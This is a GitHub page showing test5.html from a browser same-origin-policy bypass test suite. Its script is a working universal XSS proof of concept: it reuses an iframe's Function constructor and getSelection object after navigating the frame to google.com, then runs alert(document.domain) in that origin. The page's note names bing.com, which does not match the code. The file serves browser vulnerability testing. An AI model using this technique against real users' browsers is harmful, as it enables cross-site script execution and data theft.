forked from rafaybaloch/SOP-Bypass-Mini-Test-Suite
-
Notifications
You must be signed in to change notification settings - Fork 0
/
test5.html
96 lines (76 loc) · 1.84 KB
/
test5.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<html>
<head>
<title>Universal XSS (UXSS) SOP Bypass Vulnerability test</title>
<style type="text/css">
*{margin:0;padding:0;}
.wrapper {
width: 95%;
background-color: #16a085;
margin: 0 auto;
font-family: times new roman;
height: 88%;
}
.line {
background-color: #ecf0f1;
text-align: center;
padding: 10px;
color: #16a085;;
}
.main {
color: #fff;
padding: 10px;
}
.test {
width: 200px;
height: 40px;
background-color: #fff;
border: none;
border-radius: 100px;
color: #16a085;
font-size: 1.6em;
margin: 0 auto;
}
.note {
background: #1abc9c;
color: #fff;
padding: 10px;
width: 95%;
margin: 0 auto;
margin-top: 40px;
}
</style>
</head>
<body>
<div class="wrapper">
<img src="and.png">
<h3 class="line">SOP Bypass - Testcase 5</h3>
<div class="main">
<p></p>
</div>
<center> <input type="button" id="btn_test" class="test" value="Run Test Case" onclick="sop()" /></center>
<script>
function sop()
{
frame = document.body.appendChild(document.createElement("iframe"));
wnd = frame.contentWindow;
func = wnd.Function;
wnd.location = "about:blank";
frame.onload = function() {
selection = func("return getSelection()")();
wnd.location = "http://google.com";
frame.onload = function() {
frame.onload = null;
selection.baseNode.constructor.constructor.constructor("alert(document.domain)")()
}
}
}
</script>
</br></br>
<div class="note">
<p><strong>Note:</strong> <br />
If page displays an alert box with displaying bing.com, your browser is vulnerable to SOP bypass "
</p>
</div>
</div>
</body>
</html>